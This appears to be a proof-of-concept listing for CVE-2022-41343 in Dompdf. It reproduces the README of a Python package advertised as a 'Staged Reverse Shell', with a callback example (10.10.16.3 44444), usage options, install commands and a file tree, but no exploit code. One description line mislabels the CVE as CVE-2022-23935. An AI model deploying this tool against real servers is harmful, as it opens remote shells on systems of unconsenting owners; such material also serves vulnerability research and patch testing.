CVE-2022-41343 PoC — Dompdf Security Vulnerability

Source
Associated Vulnerability
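Title: Dompdf Security Vulnerability (CVE-2022-41343)
Description: Dompdf is an HTML to PDF converter. Versions of Dompdf before 2.0.1 contain a security vulnerability that stems from a URI validation failure not stopping font registration.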
Description
🐍 Python Exploit for CVE-2022-23935
Readme
# CVE-2022-41343
🐍 Python Exploit for CVE-2022-41343

Staged Reverse Shell for dompdf < 2.0.1

Based on: [Positive Sec's write-up](https://positive.security/blog/dompdf-rce) and [PoC](https://github.com/positive-security/dompdf-rce)

## Example
```
cve-2022-41343 10.10.16.3 44444
```

## Usage
```bash
usage: cve-2022-41343 [-h] [-l SERVER_PORT] [-s SHELL] [-n FONT_NAME] ip port

positional arguments:
  ip                    Shell Callback IP Address/Host
  port                  Shell Callback Port

options:
  -h, --help            show this help message and exit
  -l SERVER_PORT, --listen SERVER_PORT
                        Server Listening Port (default: 55555)
  -s SHELL, --shell SHELL
                        Remote Shell (default: bash)
  -n FONT_NAME, --font-name FONT_NAME
                        Exploit Font Name (default: comicsploitz)
```

## PyPI Installation
```bash
python3 -m pip install cve-2022-41343
```

## Manual Installation
```bash
python3 -m pip install cve_2022_41343-1.0.0-py3-none-any.whl
```
[Download Latest Release](https://github.com/BKreisel/CVE-2022-41343/releases/download/1.0.0/cve_2022_41343-1.0.0-py3-none-any.whl)

## Demo
[![demo](https://asciinema.org/a/560597.svg)](https://asciinema.org/a/560597?autoplay=1)

File Snapshot

```
[4.0K] /data/pocs/deb3f35f27ab8c436c3320a9fe54bd4dfed11be5
├── [1.0K] LICENSE
├── [ 721] pyproject.toml
├── [1.2K] README.md
└── [4.0K] src
    └── [4.0K] cve_2022_41343
        ├── [   0] __init__.py
        └── [9.3K] main.py

2 directories, 5 files
```